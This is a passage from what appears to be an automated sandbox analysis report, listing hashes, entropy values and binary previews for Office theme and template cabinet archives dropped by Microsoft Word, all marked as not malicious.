                                                                                                                            SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                                                            SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                            SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26944
                                                                                                                            Entropy (8bit):7.7574645319832225
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                            MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                            SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                            SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                            SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):43653
                                                                                                                            Entropy (8bit):7.899157106666598
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                            MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                            SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                            SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                            SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):46413
                                                                                                                            Entropy (8bit):7.9071408623961394
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                            MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                            SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                            SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                            SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):21357
                                                                                                                            Entropy (8bit):7.641082043198371
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                            MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                            SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                            SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                            SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):42788
                                                                                                                            Entropy (8bit):7.89307894056
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                            MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                                                            SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                            SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                            SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):307348
                                                                                                                            Entropy (8bit):7.996451393909308
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                                                            MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                                                            SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                                                            SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                                                            SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):222992
                                                                                                                            Entropy (8bit):7.994458910952451
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                            MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                            SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                            SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                            SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):230916
                                                                                                                            Entropy (8bit):7.994759087207758
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                            MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                            SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                            SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                            SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):271273
                                                                                                                            Entropy (8bit):7.995547668305345
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                            MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                            SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                            SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                            SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):261258
                                                                                                                            Entropy (8bit):7.99541965268665
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                            MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                            SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                            SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                            SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):276650
                                                                                                                            Entropy (8bit):7.995561338730199
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                            MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                            SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                            SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                            SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):295527
                                                                                                                            Entropy (8bit):7.996203550147553
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                            MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                            SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                            SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                            SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):550906
                                                                                                                            Entropy (8bit):7.998289614787931
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                            MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                            SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                            SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
